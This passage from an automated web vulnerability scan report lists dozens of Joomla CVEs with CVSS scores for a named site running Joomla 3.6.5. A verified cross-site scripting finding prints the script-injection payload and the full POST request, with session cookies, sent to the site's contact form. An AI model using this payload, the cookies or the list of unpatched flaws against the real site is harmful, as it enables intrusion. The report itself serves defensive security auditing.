Affected items Variation
Web Server 1
59
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Changed
Authentication: Single
CVE CVE-2020-35613
CWE CWE-89
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Changed
60
Base Score: 6.5
Authentication: Single
CVE CVE-2018-8045
CWE CWE-89
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Changed
Authentication: Single
CVE CVE-2018-11322
CWE CWE-434
Affected items Variation
Web Server 1
Classification
61
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2019-7742
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
62
Base Score: 4.3
Authentication: None
CVE CVE-2017-11612
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2018-6379
CWE CWE-79
Affected items Variation
Web Server 1
Classification
63
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2018-12711
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
64
Base Score: 4.3
Authentication: None
CVE CVE-2019-11809
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2021-23129
CWE CWE-79
Affected items Variation
Web Server 1
Classification
65
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2021-23130
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L
CVSS3
User Interaction: None
Scope: Changed
66
Base Score: 4.0
Authentication: Single
CVE CVE-2021-26036
CWE CWE-400
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2019-10945
CWE CWE-22
Affected items Variation
Web Server 1
Classification
67
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2020-24597
CWE CWE-22
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
68
Base Score: 4.0
Authentication: Single
CVE CVE-2020-35612
CWE CWE-22
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2017-14596
CWE CWE-200
Affected items Variation
Web Server 1
Classification
69
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2017-14596
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
70
Base Score: 5.0
Authentication: None
CVE CVE-2020-35611
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2020-35610
CWE CWE-200
Affected items Variation
Web Server 1
Classification
71
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CVE CVE-2018-12712
CWE CWE-22
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
72
Base Score: 4.3
Authentication: None
CVE CVE-2018-6378
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2019-6261
CVE CVE-2019-6262
CVE CVE-2019-6263
CVE CVE-2019-6264
CWE CWE-79
Affected items Variation
73
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CVE CVE-2019-19846
CWE CWE-89
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
CVSS3
User Interaction: Required
Scope: Changed
74
Base Score: 6.5
Authentication: Single
CVE CVE-2017-7983
CVE CVE-2017-7985
CVE CVE-2017-7986
CWE CWE-79
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2018-15880
CVE CVE-2018-15882
CWE CWE-79
75
CWE CWE-434
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2017-9933
CVE CVE-2017-9934
CWE CWE-79
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
76
Base Score: 5.0
Authentication: None
CVE CVE-2018-17858
CVE CVE-2018-17859
CWE CWE-264
CWE CWE-352
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2019-7739
CVE CVE-2019-7740
CVE CVE-2019-7741
CVE CVE-2019-7743
77
CVE CVE-2019-7744
CWE CWE-79
CWE CWE-915
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2018-17856
CWE CWE-915
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
78
Base Score: 3.5
Authentication: Single
CVE CVE-2018-17855
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2017-7988
CWE CWE-264
Affected items Variation
Web Server 1
Classification
79
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2021-26029
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
80
Base Score: 4.3
Authentication: None
CVE CVE-2019-15028
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2020-35616
CWE CWE-264
Affected items Variation
Web Server 1
Classification
81
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2018-11323
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
82
Base Score: 6.0
Authentication: Single
CVE CVE-2020-10238
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2020-11890
CWE CWE-264
Affected items Variation
Web Server 1
Classification
83
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2020-11889
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
84
Base Score: 4.0
Authentication: Single
CVE CVE-2020-13763
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2020-15699
CWE CWE-264
Affected items Variation
Web Server 1
Classification
85
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2021-26038
CWE CWE-284
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
86
Base Score: 4.0
Authentication: Single
CVE CVE-2021-26037
CWE CWE-613
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CVSS3
User Interaction: None
Scope: Changed
Authentication: Single
CVE CVE-2020-10243
CWE CWE-89
Affected items Variation
Web Server 1
Classification
87
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-209
Affected items Variation
Web Server 1
Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
88
CWE CWE-298
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
89
Alerts details
Cross site scripting
Severity High
Reported by module /Scripts/PerScheme/XSS.script
Description
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.
Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.
Recommendation
References
Affected items
/contacts
Verified vulnerability
Details
URL encoded POST input form[MESSAGE] was set to 555</textarea><ScRiPt >jJHD(9676)</ScRiPt>
90
POST /contacts HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.sogbci.com/
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Content-Length: 210
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
form[CONFIRMATION]=&form[EMAIL]=testing%40example.com&form[MESSAGE]=555</textarea>
<ScRiPt%20>jJHD(9676)</ScRiPt>&form[NOM]=pHqghUme&form[SOCIETE]
[]=SOGB&form[SUJET]=1&form[TELEPHONE]=555-666-0606&form[formId]=3
Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to
perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also
possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.26 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/853-20210502-core-csrf-in-ajax-reordering-endpoint.html
(https://developer.joomla.org/security-centre/853-20210502-core-csrf-in-ajax-reordering-endpoint.html)
CVE-2021-26033 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26033)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
91
Request headers
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to
perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also
possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.26 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/854-20210503-core-csrf-in-data-download-endpoints.html
(https://developer.joomla.org/security-centre/854-20210503-core-csrf-in-data-download-endpoints.html)
CVE-2021-26034 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26034)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
92
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Request Forgery (3.2.0 - 3.9.12)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to
perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also
possible. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.9.12 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/794-20191001-core-csrf-in-com-template-overrides-view.html
(https://developer.joomla.org/security-centre/794-20191001-core-csrf-in-com-template-overrides-view.html)
CVE-2019-18650 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18650)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
93
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.8.3)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.8.3 are vulnerable.
Impact
Recommendation
References
https://lorexxar.cn/2018/02/07/joomla3-8-4/ (https://lorexxar.cn/2018/02/07/joomla3-8-4/)
https://developer.joomla.org/security-centre/718-20180101-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/718-20180101-core-xss-vulnerability.html)
CVE-2018-6380 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6380)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
94
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.11)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.11 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html
(https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html)
CVE-2019-16725 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16725)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
95
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.15)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.15 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/803-20200302-core-xss-in-protostar-and-beez3.html
(https://developer.joomla.org/security-centre/803-20200302-core-xss-in-protostar-and-beez3.html)
CVE-2020-10242 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10242)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
96
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.18 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/813-20200601-core-xss-in-modules-heading-tag-option.html
(https://developer.joomla.org/security-centre/813-20200601-core-xss-in-modules-heading-tag-option.html)
CVE-2020-13761 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13761)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
97
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.18 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/815-20200603-core-xss-in-com-modules-tag-options
(https://developer.joomla.org/security-centre/815-20200603-core-xss-in-com-modules-tag-options)
CVE-2020-13762 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13762)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
98
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.18 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/816-20200604-core-xss-in-jquery-htmlprefilter.html
(https://developer.joomla.org/security-centre/816-20200604-core-xss-in-jquery-htmlprefilter.html)
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ (https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)
CVE-2020-11022 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11022)
CVE-2020-11023 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11023)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
99
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.19)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.19 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/822-20200705-core-escape-mod-random-image-link.html
(https://developer.joomla.org/security-centre/822-20200705-core-escape-mod-random-image-link.html)
CVE-2020-15696 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15696)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
100
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.25)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.25 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/850-20210401-core-escape-xss-in-logo-parameter-error-pages.html
(https://developer.joomla.org/security-centre/850-20210401-core-escape-xss-in-logo-parameter-error-pages.html)
CVE-2021-26030 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26030)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
101
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.26)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.26 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/852-20210501-core-adding-html-to-the-executable-block-list-of-mediahelper-
canupload.html (https://developer.joomla.org/security-centre/852-20210501-core-adding-html-to-the-executable-block-list-
of-mediahelper-canupload.html)
CVE-2021-26032 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26032)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
102
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.27)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.27 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/860-20210705-core-xss-in-com-media-imagelist.html
(https://developer.joomla.org/security-centre/860-20210705-core-xss-in-com-media-imagelist.html)
CVE-2021-26039 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26039)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
103
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.27)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
